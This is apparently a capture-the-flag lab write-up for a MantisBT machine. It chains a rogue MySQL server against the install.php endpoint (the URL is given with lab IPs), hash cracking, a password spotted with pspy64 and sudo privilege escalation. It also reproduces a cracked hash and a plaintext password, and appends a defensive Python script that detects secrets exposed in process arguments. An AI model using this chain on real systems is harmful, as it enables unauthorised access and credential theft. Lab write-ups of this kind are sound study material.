Mantis 🔸

Enumeration

The web server shows a template landing page. feroxbuster discovers a /bugtracker directory.

Searching for an exploit, we find https://mantisbt.org/bugs/view.php?id=23173.

Initial Access

We start the rogue server from https://github.com/allyshka/Rogue-MySql-Server.

Visit http://192.168.169.204/bugtracker/admin/install.php?install=3&hostname=192.168.45.206

Having seen config_inc.php in the Mantis repo, we can read that file.

We have the database credentials.

c7870d0b102cfb2f4916ff04e47b5c6f

We crack it using hashcat.

https://mantisbt.org/bugs/view.php?id=26091

Get the flag.

Privilege Escalation

We see a backup script but can't read it; there is a cron job.

We watch running processes using pspy64.

We see the password BugTracker007.

sudo -l shows that mantis has full privileges, so...
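The password became visible in pspy64 because process command lines are readable by other local users. The following audit is an added example, not part of the original writeup: it flags secrets passed as arguments and redacts them in its output. The function names and sample command lines are constructed assumptions, since the page does not show the actual cron command.

```python
import os
import re

# Long options that carry a secret. The short -pVALUE form is checked only for
# MySQL clients, since other tools use -p for ports or paths.
LONG_OPT = re.compile(r"^--(password|passwd|pass|secret|token)(=(.*))?$", re.I)
MYSQL_CLIENTS = {"mysql", "mysqldump", "mysqladmin"}

# Constructed samples: the page does not show the real cron command.
SAMPLES = [
    b"/bin/sh\x00/opt/backup.sh\x00--password=EXAMPLE-SECRET\x00",
    b"mysqldump\x00-ubackup\x00-pEXAMPLE-SECRET\x00bugtracker\x00",
    b"mysqldump\x00--defaults-extra-file=/root/.backup.cnf\x00bugtracker\x00",
    b"ssh\x00-p\x002222\x00host\x00",
]

def parse_cmdline(raw):
    """Split a /proc/<pid>/cmdline buffer (NUL-separated argv) into strings."""
    return [a.decode("utf-8", "replace") for a in raw.split(b"\x00") if a]

def exposed_args(argv):
    """Return redacted descriptions of arguments that carry a secret value."""
    hits = []
    mysql = bool(argv) and os.path.basename(argv[0]) in MYSQL_CLIENTS
    for i, arg in enumerate(argv[1:], start=1):
        m = LONG_OPT.match(arg)
        nxt = argv[i + 1] if i + 1 < len(argv) else ""
        if m and m.group(3):                       # --password=VALUE
            hits.append(f"--{m.group(1)}=<redacted>")
        elif m and m.group(2) is None and not mysql and nxt[:1] not in ("", "-"):
            hits.append(f"--{m.group(1)} <redacted>")   # --password VALUE
        elif mysql and arg.startswith("-p") and len(arg) > 2:
            hits.append("-p<redacted>")            # bare -p prompts, so it is fine
    return hits

def scan_proc(root="/proc"):
    """Map pid -> findings for every process whose cmdline is readable."""
    findings = {}
    for pid in filter(str.isdigit, os.listdir(root)):
        try:
            with open(os.path.join(root, pid, "cmdline"), "rb") as fh:
                hits = exposed_args(parse_cmdline(fh.read()))
        except OSError:                            # process exited or access denied
            continue
        if hits:
            findings[int(pid)] = hits
    return findings

if __name__ == "__main__":
    for raw in SAMPLES:
        print(parse_cmdline(raw)[0], exposed_args(parse_cmdline(raw)))
```

Any hit means the secret is readable by every local user who can read /proc. Moving it into a root-only option file, as in the third sample, keeps it out of argv.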

Post Exploitation

Get the flag.